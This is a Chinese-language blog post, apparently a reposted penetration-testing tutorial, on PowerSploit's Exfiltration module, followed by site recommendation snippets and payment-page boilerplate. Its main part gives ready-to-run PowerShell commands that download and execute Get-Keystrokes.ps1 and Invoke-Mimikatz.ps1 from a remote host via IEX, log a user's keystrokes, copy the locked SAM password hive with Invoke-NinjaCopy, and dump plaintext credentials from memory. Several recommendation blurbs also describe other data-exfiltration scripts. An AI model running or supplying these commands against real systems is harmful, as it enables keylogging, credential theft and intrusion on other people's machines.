POWERSPLOIT-Exfiltration(信息收集)脚本渗透实战

最新推荐文章于 2023-03-13 14:12:22 发布
最新推荐文章于 2023-03-13 14:12:22 发布
阅读量96 收藏
点赞数
文章标签: 移动开发
原文链接:http://www.cnblogs.com/-qing-/p/10544320.html
版权

Exfiltration模块

 

a) 调用Get-Keystrokes记录用户的键盘输入。

1)通过IEX下载并调用Get-Keystrokes。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Exfiltration/Get-Ke
ystrokes.ps1")
PS C:\Users\Administrator> Get-Keystrokes -LogPath c:\users\administrator\desktop\1.txt

 

 

b) 调用Invoke-NinjaCopy复制一些系统无法复制的文件如sam文件。

1)通过IEX下载并调用Get-NinjaCopy。

正常情况下复制:

 

通过Invoke-NinjaCopy进行复制:

PS C:\Users\Administrator> Invoke-NinjaCopy -Path c:\windows\system32\config\SAM -LocalDestination c:\users\administrato
r\desktop\1.sam

 

 

注意:这个脚本是要有管理员权限下才可以正常执行,否则会报错,毕竟是要拷贝系统文件,只是它做了管理员做不了的事。

 

 

 

 

c) 调用Invoke-Mimikatz(内网神器)抓取内存中的明文密码。

1)通过IEX下载并调用Invoke-Mimikatz。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Exfiltration
/Invoke-Mimikatz.ps1")
PS C:\Users\Administrator> Invoke-Mimikatz -DumpCreds

注意:这个脚本是要有管理员权限下才可以正常执行,否则会报错,毕竟涉及到密码之类的敏感信息,哪怕是管理员想看到明文的,也是很难实现的。

 

转载于:https://www.cnblogs.com/-qing-/p/10544320.html

weixin_30875157
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
信息收集脚本
weixin_67289581的博客
03-15 342
信息搜集脚本
python编写web资产信息收集脚本(简单实现)
qq_46041172的博客
06-20 2420
python编写web资产信息收集脚本(简单实现)信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行。只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。在这篇文章中主要介绍实现编写 python 脚本进行主动信息收集。.........
PowerSploit 使用方法
weixin_44844556的博客
03-13 311
powersploit
内网信息收集
qq_33040633的博客
10-15 1275
内网信息收集(自动和手动)
渗透测试 ---利用Kali进行简单的信息收集
tzyyyyyy的博客
10-26 2322
使用kali进行简单的信息收集 包括主机发现 端口扫描 版本信息获取等
PowerExfil:一组用于Red Team评估的数据渗透脚本
04-14
一组用于Red Team评估的自定义数据渗透脚本。 ExfilCards.ps1-此脚本将通过base64编码的字符串将信用卡号提取到自定义DNS服务器。 ExfilDataStreamDNS.ps1-此脚本将通过base64编码的字符串将文件的全部内容提取到...
send-my:通过 Apple 的 Find My 网络上传任意数据
07-24
发送我的Send My 允许您通过 (ab) 使用 Apple 的 Find My 网络从没有互联网连接的设备上传 abritrary 数据。 数据通过低功耗蓝牙广播并由附近的 Apple 设备转发。 该应用程序由两部分组成: 固件:ESP32 固件,可将...
信息安全_数据安全_Talent exfiltration an insiders .pdf
08-22
"Talent exfiltration an insiders"这一主题揭示了人才流失可能带来的安全隐患,这不仅仅是因为员工带走的专业知识,还可能涉及敏感信息的泄露。 业务风控、移动安全和金融安全是信息安全的三个关键领域。业务风控...
exfilkit:数据渗透实用程序,用于测试检测功能
05-16
░▒▓ exfilkit ▓▒░ Data exfiltration utility for testing detection capabilities 描述 数据泄漏实用程序,用于测试安全产品的检测功能。 显然仅出于法律目的。 渗透方法 / etc / shadow-> HTTP GET请求 ...
lollipopz:数据渗透实用程序,用于测试检测功能
03-09
棒棒糖░▒▓ lollipopz ▓▒░ Data exfiltration utility for testing detection capabilities描述数据泄漏实用程序,用于测试安全产品的检测功能。 显然仅出于法律目的。渗透方法/ etc / shadow-> HTTP GET请求...
PowerSploit:PowerSploit-PowerShell开发后框架
02-18
该项目不再受支持 PowerSploit是Microsoft PowerShell模块的集合,可用于在评估的所有阶段帮助渗透测试人员。 PowerSploit由以下模块和脚本组成: 代码执行 在目标计算机上执行代码。 Invoke-DllInjection 将Dll注入到您选择的进程ID中。 Invoke-ReflectivePEInjection 将Windows PE文件(DLL / EXE)反射性地加载到powershell进程中,或反射性地将DLL注入到远程进程中。 Invoke-Shellcode 将shellcode注入您选择的进程ID或在本地PowerShell中。 Invoke-WmiCommand 在目标计算机上执行PowerShell脚本块,并使用WMI作为C2通道返回其格式化输出。 脚本修改 修改和/或准备脚本以在受感染的计算机上执行。 Out-Encoded
kali安装PowerSploit
qq_53175607的博客
11-19 2926
PowerSploit的安装 1.使用命令git clone https://github.com/PowerShellMafia/PowerSploit从github下载文件。 2.使用命令service apache2 start启动apache服务。 3.将下载好的文件移动到var/www/html下 注意:自己下载的文件路径可能不一样,要按照自己的来。 4.重启apacheservice apache2 start,自己kali的ip/PowerSploit/进入目标页面比如 192.168.5.1
内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-11 690
在内网中,我们一定要知道自己拿下的机器的人员的职位(职位高的人在内网中权限也高,计算机中的敏感信息也多,还有一种就是特殊职位的人员,例如上面说的,一般都有一些与职位相关的敏感信息。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源什么的都不重要。powerview也是一款非常好用的powershell脚本工具,用于域内信息收集。PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。
PowerSploit脚本的用法
谢公子的博客
01-14 2168
目录 PowerSploit PowerSploit的用法 PowerView.ps1脚本的使用 PowerUp.ps1脚本的使用 Invoke-Allchecks模块 Invoke-NinjaCopy.ps1脚本的使用 PowerSploit PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中的信...
powersploit的用法
WY92139010的博客
03-11 919
一、PowerSploit简介 PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。 Powershell的优点: 1.代码运行在内存中可以不去接触磁盘 2.从另一个系统中下载代码并执行 3.很多安全产品并不能监测到powershell的活动 4.cmd.exe通常被阻止运行,但是...
内网渗透-信息收集之本机收集(命令、工具及脚本
nilwiaoglwigjwlg的博客
09-25 6261
渗透攻防: https://www.secpulse.com/archives/51527.html https://3gstudent.github.io/ 目录 一、内网信息收集 1 1.内网基础信息: 1 2.内网核心业务信息: 1 3.其他信息 2 二、内网实战(命令、工具及脚本) 2 1.用户列表、当前权限等 2 2.内网网络拓扑等信息 2 3.进程列表 3 4.端口信息 3 5.补丁...
Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes
weixin_46104215的博客
11-08 482
一、Invoke-Portscan Recon 模块的一个脚本,主要用于端口扫描 1.下载脚本 IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1") 2.扫描 Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444" 二、Invo
PowerSploit的使用
浅笑996的博客
03-26 646
Invoke-Mimikatz(依赖管理员) Import-Module .\invoke-mimikatz.ps1 Invoke-Mimikatz –DumpCreds 使用Invoke-Mimikatz –command “mimikatz命令”来执行命令: Invoke-Mimikatz –command "token::elevate" Invoke-Ninjacopy (依赖管理...
PowerShell渗透--PowerSploit(WEB安全攻防)
小英雄颂人头
03-03 3147
PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为:github.com/PowerShellMafia/PowerSploit 安装 下载程序目录 git clone https://github.com/PowerShellMafia/PowerSploi...
powersploit
最新发布
07-29
\[1\]其中,Invoke-Mimikatz是PowerSploit中的一个脚本,属于Exfiltration模块,用于信息收集。你可以通过下载命令来获取该脚本,并在目标机的PowerShell下输入相应的命令来下载该脚本。\[2\]\[3\] #### 引用[....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值